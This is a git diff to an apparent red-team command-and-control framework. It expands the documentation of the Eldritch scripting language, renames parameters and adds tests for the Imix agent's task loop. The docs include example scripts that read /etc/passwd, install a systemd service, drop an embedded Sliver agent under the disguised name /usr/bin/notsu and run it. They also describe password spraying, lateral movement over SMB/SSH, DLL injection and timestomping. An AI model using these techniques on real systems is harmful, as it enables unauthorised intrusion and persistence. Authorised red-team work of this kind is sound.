diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml index 1e4b5716b..8c5e2480b 100644 --- a/.github/workflows/tests.yml +++ b/.github/workflows/tests.yml @@ -34,6 +34,7 @@ jobs: uses: codecov/codecov-action@v3 implants: runs-on: ${{ matrix.os }} + timeout-minutes: 30 strategy: matrix: os: @@ -63,4 +64,4 @@ jobs: - name: 🔎 Run tests run: cd ./implants/ && cargo llvm-cov nextest --lcov --output-path lcov.info - name: 📶 Upload Coverage Results - uses: codecov/codecov-action@v3 \ No newline at end of file + uses: codecov/codecov-action@v3 diff --git a/docs/_data/toc.yml b/docs/_data/toc.yml index e3f628ff3..99d249c39 100644 --- a/docs/_data/toc.yml +++ b/docs/_data/toc.yml @@ -10,6 +10,8 @@ children: - title: Standard Library url: "user-guide/eldritch#standard-library" + - title: "Golem" + url: "user-guide/golem" - title: Developer Guide url: dev-guide links: diff --git a/docs/_docs/user-guide/eldritch.md b/docs/_docs/user-guide/eldritch.md index 5b2d03537..821fc94f5 100644 --- a/docs/_docs/user-guide/eldritch.md +++ b/docs/_docs/user-guide/eldritch.md @@ -1,12 +1,17 @@ --- title: Eldritch -tags: +tags: - User Guide description: Eldritch User Guide permalink: user-guide/eldritch --- # Overview -![/assets/img/coming-soon.gif](/assets/img/coming-soon.gif) +Eldritch is a pythonic red team Domain Specific Language (DSL) based on [starlark](https://github.com/facebookexperimental/starlark-rust). + +Eldritch is a small interpreter that can be embedded into a c2 agent as it is with Golem and Imix. +By embedding the interpreter into the agent conditional logic can be quickly evaluated without requiring multiple callbacks. + +Eldritch is currently under active development to help delineate methods in development the description contains the phrase `X method will`. 
## Data types Eldritch currently only supports the [default starlark data types.](https://github.com/facebookexperimental/starlark-rust/blob/main/docs/types.md) @@ -17,30 +22,84 @@ Eldritch doesn't implement any form of error handling. If a function fails it wi If you're using a functions that has a chance to error (functions that do file / network IO) test preemptively with function like `is_file`, `is_dir`, `is_windows`, etc. For example: -```Python -if is_linux(): - if is_file("/etc/passwd"): - file.read("/etc/passwd") +```python +def read_passwd(): + if is_linux(): + if is_file("/etc/passwd"): + file.read("/etc/passwd") +read_passwd() +``` + +```python +def write_systemd_service(): + if is_linux(): + if is_dir("/lib/systemd/system/"): + service_args = { + "name":"my-service", + "desc":"A test", + "binary_path":"/bin/false", + } + assets.copy("systemd-template.j2", "/tmp/systemd-template.j2") + file.template("/tmp/systemd-template.j2","/lib/systemd/system/myservice.service",service_args,False) + file.remove("/tmp/systemd-template.j2") + +write_systemd_service() ``` # Standard Library -The Standard Library is very cool, and will be even cooler when Nick documents it. +The standard library is the default functionality that eldritch provides. -### file.append -`file.append(path: str, content: str) -> None` +It currently contains five modules: +- `assets` - Used to interact with files stored natively in the agent. +- `file` - Used to interact with files on the system. +- `pivot` - Used to identify and move between systems. +- `process` - Used to interact with processes on the system. +- `sys` - General system capabilities can include loading libraries, or information about the current context. -The file.append Append content str to file at path. If no file exists at path create the file with the contents content. +Functions fall into one of these five modules. This is done to improve clarity about function use. 
-### file.copy -`file.copy(src: str, dst: str) -> None` +--- + +## Assets +### assets.copy +`assets.copy(src: str, dst: str) -> None` + +The assets.copy method copies an embedded file from the agent to disk. +The `src` variable will be the path from the `embed_files_golem_prod` as the root dir. +For example `embed_files_golem_prod/sliver/agent-x64` can be referenced as `sliver/agent-x64`. +If `dst` exists it will be overwritten. If it doesn't exist the function will fail. -The file.copy copies a file from src path to dst path. If dst file doesn't exist it will be created. +```python +def deploy_agent(): + if file.is_dir("/usr/bin"): + assets.copy("sliver/agent-x64","/usr/bin/notsu") + sys.exec("/usr/bin/notsu",[],True) +deploy_agent() +``` + +### assets.list +`assets.list() -> List` + +The assets.list method returns a list of asset names that the agent is aware of. + +--- + +## File +### file.append +`file.append(path: str, content: str) -> None` + +The file.append method appends the `content` to file at `path`. If no file exists at `path` the file will be created with the contents of `content`. ### file.compress `file.compress(src: str, dst: str) -> None` -The file.compress function compresses a file using the gzip algorithm. If the destination file doesn't exist it will be created. If the source file doesn't exist an error will be thrown. If the source path is a directory the contents will be placed in a tar archive and then compressed. +The file.compress method compresses a file using the gzip algorithm. If the destination file doesn't exist it will be created. If the source file doesn't exist an error will be thrown. If the source path is a directory the contents will be placed in a tar archive and then compressed. + +### file.copy +`file.copy(src: str, dst: str) -> None` + +The file.copy method copies a file from `src` path to `dst` path. If `dst` file doesn't exist it will be created. 
### file.download `file.download(uri: str, dst: str) -> None` @@ -50,28 +109,33 @@ The file.download method downloads a file at the URI specified in `uri` t ### file.exists `file.exists(path: str) -> bool` -The file.exists checks if a file or directory exists at the path specified. +The file.exists method checks if a file or directory exists at the path specified. ### file.hash `file.hash(path: str) -> str` -The file.hash takes a sha256 hash of the file specified in path. +The file.hash method returns a sha256 hash of the file specified in `path`. ### file.is_dir `file.is_dir(path: str) -> bool` -The file.is_dir checks if a path exists and is a directory. If it doesn't exist or is not a directory it will return false. +The file.is_dir method checks if a path exists and is a directory. If it doesn't exist or is not a directory it will return `False`. ### file.is_file `file.is_file(path: str) -> bool` -The file.is_file checks if a path exists and is a file. If it doesn't exist or is not a file it will return false. +The file.is_file method checks if a path exists and is a file. If it doesn't exist or is not a file it will return `False`. ### file.mkdir `file.mkdir(path: str) -> None` The file.mkdir method is very cool, and will be even cooler when Nick documents it. +### file.moveto +`file.moveto(src: str, dst: str) -> None` + +The file.moveto method moves a file or directory from src to `dst`. If the `dst` directory or file exists it will be deleted before being replaced to ensure consistency across systems. + ### file.read `file.read(path: str) -> str` @@ -80,12 +144,7 @@ The file.read method will read the contents of a file. If the file or dir ### file.remove `file.remove(path: str) -> None` -The file.remove method will delete a file or directory (and it's contents) specified by path. - -### file.moveto -`file.moveto(src: str, dst: str) -> None` - -The file.moveto method will move a file or directory from src to dst. 
If the dst directory or file exists it will be deleted before being replaced. To ensure consistency across systems. +The file.remove method deletes a file or directory (and its contents) specified by path. ### file.replace `file.replace(path: str, pattern: str, value: str) -> None` @@ -96,6 +155,14 @@ The file.replace method is very cool, and will be even cooler when Nick d The file.replace_all method finds all strings matching a regex pattern in the specified file and replaces them with the value. +### file.template +`file.template(template_path: str, dst: str, args: Dict, autoescape: bool) -> None` + +The file.template method reads a Jinja2 template file from disk, fills in the variables using `args` and then writes it to the destination specified. +If the destination file doesn't exist it will be created (if the parent directory exists). If the destination file does exist it will be overwritten. +The `args` dictionary currently supports values of: `int`, `str`, and `List`. +`autoescape` when `True` will perform HTML character escapes according to the [OWASP XSS guidelines](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html). + ### file.timestomp `file.timestomp(src: str, dst: str) -> None` @@ -106,15 +173,92 @@ The file.timestomp method is very cool, and will be even cooler when Nick The file.write method is very cool, and will be even cooler when Nick documents it. +--- + +## Pivot +### pivot.arp_scan +`pivot.arp_scan(target_cidrs: List) -> List` + +The pivot.arp_scan method is being proposed to allow users to enumerate hosts on their network without using TCP connect or ping. + +### pivot.bind_proxy +`pivot.bind_proxy(listen_address: str, listen_port: int, username: str, password: str ) -> None` + +The pivot.bind_proxy method is being proposed to provide users another option when trying to connect and pivot within an environment. 
This function will start a SOCKS5 proxy on the specified port and interface, with the specified username and password (if provided). + +### pivot.ncat +`pivot.ncat(address: str, port: int, data: str, protocol: str ) -> str` + +The pivot.ncat method allows a user to send arbitrary data over TCP/UDP to a host. If the server responds that response will be returned. + +`protocol` must be `tcp`, or `udp` anything else will return an error `Protocol not supported please use: udp or tcp.`. + +### pivot.port_scan +`pivot.port_scan(target_cidrs: List, ports: List, protocol: str, timeout: int) -> List` + +The pivot.port_scan method allows users to scan TCP/UDP ports within the eldritch language. +Inputs: +- `target_cidrs` must be in a CIDR format eg. `127.0.0.1/32`. Domains and single IPs `example.com` / `127.0.0.1` cannot be passed. +- `ports` can be a list of any number of integers between 1 and 65535. +- `protocol` must be: `tcp` or `udp`. These are the only supported options. +- `timeout` is the number of seconds a scan will wait without a response before it's marked as `timeout` + +Results will be in the format: + +```JSON +[ + { "ip": "127.0.0.1", "port": 22, "protocol": "tcp", "status": "open"}, + { "ip": "127.0.0.1", "port": 21, "protocol": "tcp", "status": "closed"}, + { "ip": "127.0.0.1", "port": 80, "protocol": "tcp", "status": "timeout"}, +] +``` + +A port's status can be open, closed, or timeout: + +|**State**|**Protocol**| **Meaning** | +|---------|------------|------------------------------------------------------| +| open | tcp | Connection successful. | +| closed | tcp | Connection refused. | +| timeout | tcp | Connection dropped or didn't respond. | +| open | udp | Connection returned some data. | +| timeout | udp | Connection was refused, dropped, or didn't respond. | + +Each IP in the specified CIDR will be returned regardless of if it returns any open ports. +Be mindful of this when scanning large CIDRs as it may create large return objects. 
+ +NOTE: Windows scans against `localhost`/`127.0.0.1` can behave unexpectedly or even treat the action as malicious. Eg. scanning ports 1-65535 against windows localhost may cause the stack to overflow or process to hang indefinitely. + +### pivot.port_forward +`pivot.port_forward(listen_address: str, listen_port: int, forward_address: str, forward_port: int, protocol: str ) -> None` + +The pivot.port_forward method is being proposed to provide socat like functionality by forwarding traffic from a port on a local machine to a port on a different machine allowing traffic to be relayed. + +### pivot.smb_exec +`pivot.smb_exec(target: str, port: int, username: str, password: str, hash: str, command: str) -> str` + +The pivot.smb_exec method is being proposed to allow users a way to move between hosts running smb. + +### pivot.ssh_exec +`pivot.ssh_exec(target: str, port: int, username: str, password: str, key: str, command: str, shell_path: str) -> List` + +The pivot.ssh_exec method is being proposed to allow users a way to move between hosts running ssh. + +### pivot.ssh_password_spray +`pivot.ssh_password_spray(targets: List, port: int, credentials: List, keys: List, command: str, shell_path: str) -> List` + +The pivot.ssh_password_spray method is being proposed to allow users a way to test found credentials against neighboring targets. It will iterate over the targets list and try each credential set. Credentials will be a formatted list of usernames and passwords Eg. "username:password". The function will return a formatted list of "target:username:password". command and shell_path are intended to give more flexibility but may be adding complexity. + +## Process ### process.kill `process.kill(pid: int) -> None` -The process.kill will kill a process using the KILL signal given its process id. +The process.kill method will kill a process using the KILL signal given its process id. 
### process.list `process.list() -> List` -The process.list method will return a list of dictionarys that describe each process. The dictionaries follow the schema: +The process.list method returns a list of dictionaries that describe each process. The dictionaries follow the schema: + ```json { "pid": "9812", @@ -134,6 +278,7 @@ The process.list method will return a list of dictionarys that describe e The process.name method is very cool, and will be even cooler when Nick documents it. +## Sys ### sys.dll_inject `sys.dll_inject(dll_path: str, pid: int) -> None` @@ -166,12 +311,7 @@ sys.execute("/bin/bash",["-c", "ls /nofile"]) ### sys.is_linux `sys.is_linux() -> bool` -The sys.is_linux method returns true if on a linux system and fales on everything else. - -### sys.is_windows -`sys.is_windows() -> bool` - -The sys.is_windows method returns true if on a windows system and fales on everything else. +The sys.is_linux method returns `True` if on a linux system and `False` on everything else. ### sys.is_macos `sys.is_macos() -> bool` @@ -217,49 +357,13 @@ The pivot.smb_exec method is being proposed to allow users a way to move ### pivot.port_scan `pivot.port_scan(target_cidrs: List, ports: List, protocol: str, timeout: int) -> List` -The pivot.port_scan method allows users to scan TCP/UDP ports within the eldritch language. -Inputs: -- `target_cidrs` must be in a CIDR format eg. `127.0.0.1/32`. Domains and single IPs `example.com` / `127.0.0.1` cannot be passed. -- `ports` can be a list of any number of integers between 1 and 65535. -- `protocol` must be: `tcp` or `udp`. These are the only supported options. 
-- `timeout` is the number of seconds a scan will wait without a response before it's marked as `timeout` - -Results will be in the format: -```JSON -[ - { "ip": "127.0.0.1", "port": 22, "protocol": "tcp", "status": "open"}, - { "ip": "127.0.0.1", "port": 21, "protocol": "tcp", "status": "closed"}, - { "ip": "127.0.0.1", "port": 80, "protocol": "tcp", "status": "timeout"}, -] -``` -A ports status can be open, closed, or timeout: -|**State**|**Protocol**| **Meaning** | -|---------|------------|------------------------------------------------------| -| open | tcp | Connection successful. | -| close | tcp | Connection refused. | -| timeout | udp | Connection was refused, dropped, or didn't respond | - -Each IP in the specified CIDR will be returned regardless of if it returns any open ports. -Be mindful of this when scanning large CIDRs as it may create largo return objects. - -NOTE: Windows scans against `localhost`/`127.0.0.1` can behave unexpectedly or even treat the action as malicious. Eg. scanning ports 1-65535 against windows localhost may cause the stack to overflow or process to hang indefinitely. - -### pivot.arp_scan -`pivot.arp_scan(target_cidrs: List) -> List` - -The pivot.arp_scan method is being proposed to allow users to enumerate hosts on their network without using TCP connect or ping. - -### pivot.port_forward -`pivot.port_forward(listen_address: str, listen_port: int, forward_address: str, forward_port: int, str: portocol ) -> None` - -The pivot.port_forward method is being proposed to providde socat like functionality by forwarding traffic from a port on a local machine to a port on a different machine allowing traffic to be relayed. +### sys.is_windows +`sys.is_windows() -> bool` -### pivot.ncat -`pivot.ncat(address: str, port: int, data: str, str: portocol ) -> str` +The sys.is_windows method returns `True` if on a windows system and `False` on everything else. -The pivot.ncat method allows a user to send arbitrary data over TCP/UDP to a host. 
If the server responds that response will be returned. +### sys.shell +`sys.shell(cmd: str) -> str` -### pivot.bind_proxy -`pivot.bind_proxy(listen_address: str, listen_port: int, username: str, password: str ) -> None` +The sys.shell method takes a string and runs it in a native interpreter. On MacOS, Linux, and *nix/bsd systems this is `/bin/bash -c `. On Windows this is `cmd /C `. Stdout from the process will be returned. If your command errors the error will be ignored and not passed back to you. -The pivot.bind_proxy method is being proposed to provide users another option when trying to connect and pivot within an environment. This function will start a SOCKS5 proxy on the specificed port and interface, with the specificed username and password (if provided). diff --git a/docs/_docs/user-guide/tavern.md b/docs/_docs/user-guide/tavern.md index 136c8662f..1f8c120f0 100644 --- a/docs/_docs/user-guide/tavern.md +++ b/docs/_docs/user-guide/tavern.md @@ -71,7 +71,7 @@ After installing the gcloud CLI, run `gcloud auth application-default login` to terraform apply -var="gcp_project=new-realm-deployment" -var="oauth_client_id=12345.apps.googleusercontent.com" -var="oauth_client_secret=ABCDEFG" -var="oauth_domain=test-tavern.redteam.toys" ``` -After terraform completes succesfully, head to the [DNS mappings for Cloud Run](https://console.cloud.google.com/run/domains) and wait for a certificate to successfully provision. This may take a while, so go enjoy a nice cup of coffee ☕ +After terraform completes successfully, head to the [DNS mappings for Cloud Run](https://console.cloud.google.com/run/domains) and wait for a certificate to successfully provision. This may take a while, so go enjoy a nice cup of coffee ☕ After your certificate has successfully provisioned, it may still take a while (e.g. an hour or two) before you are able to visit Tavern using your custom OAuth Domain (if configured). 
diff --git a/implants/eldritch/src/pivot.rs b/implants/eldritch/src/pivot.rs index 6b52e0f3b..232556cbb 100644 --- a/implants/eldritch/src/pivot.rs +++ b/implants/eldritch/src/pivot.rs @@ -67,22 +67,22 @@ fn methods(builder: &mut MethodsBuilder) { smb_exec_impl::smb_exec(target, port, username, password, hash, command) } // May want these too: PSRemoting, WMI, WinRM - fn port_scan<'v>(this: PivotLibrary, starlark_heap: &'v Heap, target_cidrs: Vec, ports: Vec, portocol: String, timeout: i32) -> anyhow::Result>> { + fn port_scan<'v>(this: PivotLibrary, starlark_heap: &'v Heap, target_cidrs: Vec, ports: Vec, protocol: String, timeout: i32) -> anyhow::Result>> { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } - port_scan_impl::port_scan(starlark_heap, target_cidrs, ports, portocol, timeout) + port_scan_impl::port_scan(starlark_heap, target_cidrs, ports, protocol, timeout) } fn arp_scan(this: PivotLibrary, target_cidrs: Vec) -> anyhow::Result> { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } arp_scan_impl::arp_scan(target_cidrs) } - fn port_forward(this: PivotLibrary, listen_address: String, listen_port: i32, forward_address: String, forward_port: i32, portocol: String) -> anyhow::Result { + fn port_forward(this: PivotLibrary, listen_address: String, listen_port: i32, forward_address: String, forward_port: i32, protocol: String) -> anyhow::Result { if false { println!("Ignore unused this var. _this isn't allowed by starlark. 
{:?}", this); } - port_forward_impl::port_forward(listen_address, listen_port, forward_address, forward_port, portocol)?; + port_forward_impl::port_forward(listen_address, listen_port, forward_address, forward_port, protocol)?; Ok(NoneType{}) } - fn ncat(this: PivotLibrary, address: String, port: i32, data: String, portocol: String) -> anyhow::Result { + fn ncat(this: PivotLibrary, address: String, port: i32, data: String, protocol: String) -> anyhow::Result { if false { println!("Ignore unused this var. _this isn't allowed by starlark. {:?}", this); } - ncat_impl::ncat(address, port, data, portocol) + ncat_impl::ncat(address, port, data, protocol) } // Seems to have the best protocol support - https://github.com/ajmwagar/merino fn bind_proxy(this: PivotLibrary, listen_address: String, listen_port: i32, username: String, password: String) -> anyhow::Result { diff --git a/implants/eldritch/src/pivot/port_forward_impl.rs b/implants/eldritch/src/pivot/port_forward_impl.rs index 5098543a8..10e215e99 100644 --- a/implants/eldritch/src/pivot/port_forward_impl.rs +++ b/implants/eldritch/src/pivot/port_forward_impl.rs @@ -1,5 +1,5 @@ use anyhow::Result; -pub fn port_forward(_listen_address: String, _listen_port: i32, _forward_address: String, _forward_port: i32, _portocol: String) -> Result<()> { +pub fn port_forward(_listen_address: String, _listen_port: i32, _forward_address: String, _forward_port: i32, _protocol: String) -> Result<()> { unimplemented!("Method unimplemented") } \ No newline at end of file diff --git a/implants/eldritch/src/pivot/port_scan_impl.rs b/implants/eldritch/src/pivot/port_scan_impl.rs index 385ccde94..2412a2921 100644 --- a/implants/eldritch/src/pivot/port_scan_impl.rs +++ b/implants/eldritch/src/pivot/port_scan_impl.rs @@ -336,8 +336,8 @@ async fn handle_port_scan(target_cidrs: Vec, ports: Vec, protocol: // ] // Non-async wrapper for our async scan. 
-pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec, portocol: String, timeout: i32) -> Result> { - if portocol != TCP && portocol != UDP { +pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec, protocol: String, timeout: i32) -> Result> { + if protocol != TCP && protocol != UDP { return Err(anyhow::anyhow!("Unsupported protocol. Use 'tcp' or 'udp'.")) } @@ -347,7 +347,7 @@ pub fn port_scan(starlark_heap: &Heap, target_cidrs: Vec, ports: Vec anyhow::Result<()> { tome_files_and_content.push( (tome_path, tome_contents) ) } - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); diff --git a/implants/imix/src/main.rs b/implants/imix/src/main.rs index d3108705f..c1836fbb3 100644 --- a/implants/imix/src/main.rs +++ b/implants/imix/src/main.rs @@ -50,13 +50,12 @@ async fn handle_exec_tome(task: GraphQLTask, print_channel_sender: Sender local_thread_res, Err(_) => todo!(), }; - + // let res = eldritch_run(tome_name, tome_contents, task_job.parameters, &print_handler); match res { Ok(tome_output) => Ok((tome_output, "".to_string())), Err(tome_error) => Ok(("".to_string(), tome_error.to_string())), @@ -69,7 +68,6 @@ async fn handle_exec_timeout_and_response(task: graphql::GraphQLTask, print_chan // Define a future for our execution task let exec_future = handle_exec_tome(task.clone(), print_channel_sender.clone()); - // Execute that future with a timeout defined by the timeout argument. 
let tome_result = match tokio::time::timeout(timeout_duration, exec_future).await { Ok(res) => { @@ -81,6 +79,10 @@ async fn handle_exec_timeout_and_response(task: graphql::GraphQLTask, print_chan Err(timer_elapsed) => ("".to_string(), format!("Time elapsed task {} has been running for {} seconds", task.id, timer_elapsed.to_string())), }; + // let tome_result = tokio::task::spawn(exec_future).await??; + // let tome_result = tokio::spawn(exec_future).await??; + + print_channel_sender.clone().send(format!("---[RESULT]----\n{}\n---------",tome_result.0))?; print_channel_sender.clone().send(format!("---[ERROR]----\n{}\n--------",tome_result.1))?; Ok(()) @@ -130,7 +132,7 @@ fn get_primary_ip() -> Result { } }, Err(e) => { - println!("Error getting primary ip address:\n{e}"); + eprintln!("Error getting primary ip address:\n{e}"); "DANGER-UNKNOWN".to_string() }, }; @@ -166,7 +168,7 @@ fn get_os_pretty_name() -> Result { // Async handler for port scanning. async fn main_loop(config_path: String, run_once: bool) -> Result<()> { - let debug = true; + let debug = false; let version_string = "v0.1.0"; let config_file = File::open(config_path)?; let imix_config: imix::Config = serde_json::from_reader(config_file)?; @@ -234,6 +236,7 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { }; loop { + let start_time = Utc::now().time(); // 0. 
Get loop start time let loop_start_time = Instant::now(); if debug { println!("Get new tasks"); } @@ -241,25 +244,25 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { // 1a) calculate callback uri let cur_callback_uri = imix_config.callback_config.c2_configs[0].uri.clone(); + if debug { println!("[{}]: collecting tasks", (Utc::now().time() - start_time).num_milliseconds()) } // 1b) Collect new tasks let new_tasks = match graphql::gql_claim_tasks(cur_callback_uri.clone(), claim_tasks_input.clone()).await { Ok(tasks) => tasks, Err(error) => { - if debug { - println!("main_loop: error claiming task\n{:?}", error) - } + if debug { println!("main_loop: error claiming task\n{:?}", error) } let empty_vec = vec![]; empty_vec }, }; - if debug { println!("Starting {} new tasks", new_tasks.len()); } + if debug { println!("[{}]: Starting {} new tasks", (Utc::now().time() - start_time).num_milliseconds(), new_tasks.len()); } // 2. Start new tasks for task in new_tasks { if debug { println!("Launching:\n{:?}", task.clone().job.unwrap().tome.eldritch); } let (sender, receiver) = channel::(); let exec_with_timeout = handle_exec_timeout_and_response(task.clone(), sender.clone()); + if debug { println!("[{}]: Queueing task {}", (Utc::now().time() - start_time).num_milliseconds(), task.clone().id); } match all_exec_futures.insert(task.clone().id, ExecTask{ future_join_handle: task::spawn(exec_with_timeout), start_time: Utc::now(), @@ -267,38 +270,40 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { print_reciever: receiver, }) { Some(_old_task) => { - if debug { - println!("main_loop: error adding new task. Non-unique taskID\n"); - } + if debug {println!("main_loop: error adding new task. 
Non-unique taskID\n");} }, - None => {}, // Task queued successfully + None => { + if debug {println!("main_loop: Task queued successfully\n");} + }, // Task queued successfully } + if debug { println!("[{}]: Queued task {}", (Utc::now().time() - start_time).num_milliseconds(), task.clone().id); } } - - if debug { println!("Sleeping"); } // 3. Sleep till callback time // time_to_wait - time_elapsed - let time_to_sleep = imix_config.callback_config.interval - loop_start_time.elapsed().as_secs() ; - tokio::time::sleep(std::time::Duration::new(time_to_sleep, 24601)).await; - + let time_to_sleep = imix_config.callback_config.interval - loop_start_time.elapsed().as_secs(); + if debug { println!("[{}]: Sleeping seconds {}", (Utc::now().time() - start_time).num_milliseconds(), time_to_sleep); } + // tokio::time::sleep(std::time::Duration::new(time_to_sleep, 24601)).await; // This seems to wait for other threads to finish. + std::thread::sleep(std::time::Duration::new(time_to_sleep, 24601)); // This just sleeps our thread. // :clap: :clap: make new map! let mut running_exec_futures: HashMap = HashMap::new(); - if debug { println!("Checking status"); } + if debug { println!("[{}]: Checking task status", (Utc::now().time() - start_time).num_milliseconds()); } // Check status & send response for exec_future in all_exec_futures.into_iter() { - if debug { - println!("{}: {:?}", exec_future.0, exec_future.1.future_join_handle.is_finished()); - } + if debug { println!("[{}]: Task # {} is_finished? {}", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0, exec_future.1.future_join_handle.is_finished()); } let mut res: Vec = vec![]; + // Loop over each line of output from the task. 
loop { - if debug { println!("Reciveing output"); } + if debug { println!("[{}]: Task # {} recieving output", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0); } let new_res_line = match exec_future.1.print_reciever.recv_timeout(Duration::from_millis(100)) { - Ok(local_res_string) => local_res_string, + Ok(local_res_string) => { + local_res_string + }, Err(local_err) => { match local_err.to_string().as_str() { "channel is empty and sending half is closed" => { break; }, + "timed out waiting on channel" => { break; }, _ => eprint!("Error: {}", local_err), } break; @@ -328,16 +333,14 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { } }, }; - if debug { - println!("{}", task_response.output); - } + if debug { println!("[{}]: Task {} output: {}", (Utc::now().time() - start_time).num_milliseconds(), exec_future.0, task_response.output); } let submit_task_result = graphql::gql_post_task_result(cur_callback_uri.clone(), task_response).await; let _ = match submit_task_result { Ok(_) => Ok(()), // Currently no reason to save the task since it's the task we just answered. 
Err(error) => Err(error), }; - // Only re-insert the runnine exec futures + // Only re-insert the runnine exec futures if !exec_future.1.future_join_handle.is_finished() { running_exec_futures.insert(exec_future.0, exec_future.1); } @@ -349,7 +352,6 @@ async fn main_loop(config_path: String, run_once: bool) -> Result<()> { } } - pub fn main() -> Result<(), imix::Error> { let matches = Command::new("imix") .arg( @@ -371,7 +373,7 @@ pub fn main() -> Result<(), imix::Error> { .get_matches(); - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); @@ -393,7 +395,7 @@ pub fn main() -> Result<(), imix::Error> { if let Some(config_path) = matches.value_of("config") { match runtime.block_on(main_loop(config_path.to_string(), false)) { Ok(_) => {}, - Err(error) => println!("Imix mail_loop exited unexpectedly with config: {}\n{}", config_path.to_string(), error), + Err(error) => eprintln!("Imix main_loop exited unexpectedly with config: {}\n{}", config_path.to_string(), error), } } Ok(()) @@ -414,7 +416,6 @@ mod tests { let primary_ip_address = match get_primary_ip() { Ok(local_primary_ip) => local_primary_ip, Err(local_error) => { - println!("An error occured during testing default_ip:{local_error}"); assert_eq!(false,true); "DANGER-UNKNOWN".to_string() }, @@ -425,7 +426,6 @@ mod tests { #[test] fn imix_test_get_os_pretty_name() { let res = get_os_pretty_name().unwrap(); - println!("{res}"); assert!(!res.contains("UNKNOWN")); } @@ -453,7 +453,7 @@ sys.shell(input_params["cmd"])["stdout"] }; - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); @@ -467,7 +467,6 @@ sys.shell(input_params["cmd"])["stdout"] let stdout = receiver.recv_timeout(Duration::from_millis(500)).unwrap(); assert_eq!(stdout, "custom_print_handler_test".to_string()); - println!("{:?}", result.clone()); let 
mut bool_res = false; if cfg!(target_os = "linux") || @@ -487,6 +486,65 @@ sys.shell(input_params["cmd"])["stdout"] } + + #[test] + fn imix_test_main_loop_sleep_twice_short() -> Result<()> { + // Response expectations are poped in reverse order. + let server = Server::run(); + server.expect( + Expectation::matching(all_of![ + request::method_path("POST", "/graphql"), + request::body(matches(".*ImixPostResult.*main_loop_test_success.*")) + ]) + .times(2) + .respond_with(status_code(200) + .body(r#"{"data":{"submitTaskResult":{"id":"17179869185"}}}"#)), + ); + server.expect( + Expectation::matching(all_of![ + request::method_path("POST", "/graphql"), + request::body(matches(".*claimTasks.*")) + ]) + .times(1) + .respond_with(status_code(200) + .body(r#"{"data":{"claimTasks":[{"id":"17179869185","job":{"id":"4294967297","name":"Sleep1","parameters":"{}","tome":{"id":"21474836482","name":"sleep","description":"sleep stuff","paramDefs":"{}","eldritch":"def test():\n if sys.is_macos():\n sys.shell(\"sleep 3\")\n if sys.is_linux():\n sys.shell(\"sleep 3\")\n if sys.is_windows():\n sys.shell(\"timeout 3\")\ntest()\nprint(\"main_loop_test_success\")","files":[]},"bundle":null}},{"id":"17179869186","job":{"id":"4294967298","name":"Sleep1","parameters":"{}","tome":{"id":"21474836483","name":"sleep","description":"sleep stuff","paramDefs":"{}","eldritch":"def test():\n if sys.is_macos():\n sys.shell(\"sleep 3\")\n if sys.is_linux():\n sys.shell(\"sleep 3\")\n if sys.is_windows():\n sys.shell(\"timeout 3\")\ntest()\nprint(\"main_loop_test_success\")","files":[]},"bundle":null}}]}}"#)), + ); + + let tmp_file_new = NamedTempFile::new()?; + let path_new = String::from(tmp_file_new.path().to_str().unwrap()).clone(); + let url = server.url("/graphql").to_string(); + let _ = std::fs::write(path_new.clone(),format!(r#"{{ + "service_configs": [], + "target_forward_connect_ip": "127.0.0.1", + "target_name": "test1234", + "callback_config": {{ + "interval": 4, + "jitter": 0, + "timeout": 
4, + "c2_configs": [ + {{ + "priority": 1, + "uri": "{url}" + }} + ] + }} +}}"#)); + + let runtime = tokio::runtime::Builder::new_multi_thread() + .enable_all() + .build() + .unwrap(); + + // Define a future for our execution task + let start_time = Utc::now().time(); + let exec_future = main_loop(path_new, true); + let _result = runtime.block_on(exec_future).unwrap(); + let end_time = Utc::now().time(); + let diff = (end_time - start_time).num_milliseconds(); + assert!(diff < 4500); + Ok(()) + } + #[test] fn imix_test_main_loop_run_once() -> Result<()> { @@ -519,7 +577,7 @@ sys.shell(input_params["cmd"])["stdout"] "target_forward_connect_ip": "127.0.0.1", "target_name": "test1234", "callback_config": {{ - "interval": 8, + "interval": 4, "jitter": 1, "timeout": 4, "c2_configs": [ @@ -531,20 +589,18 @@ sys.shell(input_params["cmd"])["stdout"] }} }}"#)); - let runtime = tokio::runtime::Builder::new_current_thread() + let runtime = tokio::runtime::Builder::new_multi_thread() .enable_all() .build() .unwrap(); - // let (sender, receiver) = channel::(); - - // // Define a future for our execution task - // let exec_future = handle_exec_tome(test_tome_input, sender.clone()) let exec_future = main_loop(path_new, true); let _result = runtime.block_on(exec_future).unwrap(); assert!(true); Ok(()) } + + }